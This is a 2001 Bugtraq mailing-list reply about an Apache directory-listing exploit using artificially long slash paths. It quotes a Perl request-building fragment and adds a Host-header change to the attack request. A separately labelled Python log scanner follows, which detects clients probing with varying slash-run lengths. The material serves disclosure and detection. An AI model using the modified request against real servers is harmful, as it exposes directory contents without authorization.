[21030] in bugtraq
Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
daemon@ATHENA.MIT.EDU (Stephen Cope)
Fri Jun 15 11:54:44 2001
Date: Fri, 15 Jun 2001 14:48:44 +1200
From: Stephen Cope <mail-d-20010615@kimihia.org.nz>
To: Matt Watchinski <matt@farm9.com>
Cc: bugtraq@securityfocus.com
Message-ID: <20010615144844.A20679@mess.kimihia.org.nz>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3B2719E3.FA5BD8F4@farm9.com>; from matt@farm9.com on Wed, Jun 13, 2001 at 02:44:35AM -0500
In my testing you need to take the Host header into account.
: $url = "GET ";
: $buffer = "/" x $low . " HTTP/1.0\r\n";
: $end = "\r\n\r\n";
The server I tested against uses mod_rewrite to do virtual hosting, and it
arrived at a different magic number with the Host header, and again
without the header.
I made the following change to the above code:
$buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";
Should be fairly easy to understand.
--
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/
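
Added example (not part of the message above or of the script it quotes): a defender-side check of access logs for the request shape discussed here, paths made of long slash runs requested at several different lengths. The log layout (virtual host name prepended to common log format), the thresholds, host names and addresses are assumptions constructed for illustration; hits are grouped per virtual host because the message reports that the required length changes with the Host header.

```python
import re
from collections import defaultdict

# Assumed log layout (not from the post): "%v %h %l %u %t \"%r\" %>s %b",
# i.e. Apache common log format with the virtual host name prepended.
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) \S+$'
)
MIN_SLASH_RUN = 100       # assumed threshold; tune to the site's longest real URL
MIN_DISTINCT_LENGTHS = 3  # several different lengths from one client = length sweep


def slash_run(path):
    """Length of the longest run of consecutive '/' characters in the path."""
    return max((len(run) for run in re.findall(r'/+', path)), default=0)


def find_probes(lines):
    """Map (client, vhost) -> sorted slash-run lengths for clients sweeping lengths."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        run = slash_run(m['path'])
        if run >= MIN_SLASH_RUN:
            seen[(m['client'], m['vhost'])].add(run)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= MIN_DISTINCT_LENGTHS}


def make_line(vhost, client, path, status=200):
    """Build one constructed log line in the assumed layout."""
    return (f'{vhost} {client} - - [15/Jun/2001:14:48:44 +1200] '
            f'"GET {path} HTTP/1.0" {status} 512')


# Constructed sample data: one client sweeping lengths on one vhost, plus other traffic.
SAMPLE = [make_line("www.example.org", "192.0.2.10", "/" * n, 403) for n in (500, 750, 875)]
SAMPLE += [
    make_line("www.example.org", "198.51.100.7", "/index.html"),
    make_line("shop.example.org", "198.51.100.7", "//cart//view"),
    make_line("shop.example.org", "192.0.2.10", "/" * 500, 403),
]

if __name__ == "__main__":
    for (client, vhost), lengths in find_probes(SAMPLE).items():
        print(f"{client} -> {vhost}: slash-run lengths {lengths}")
```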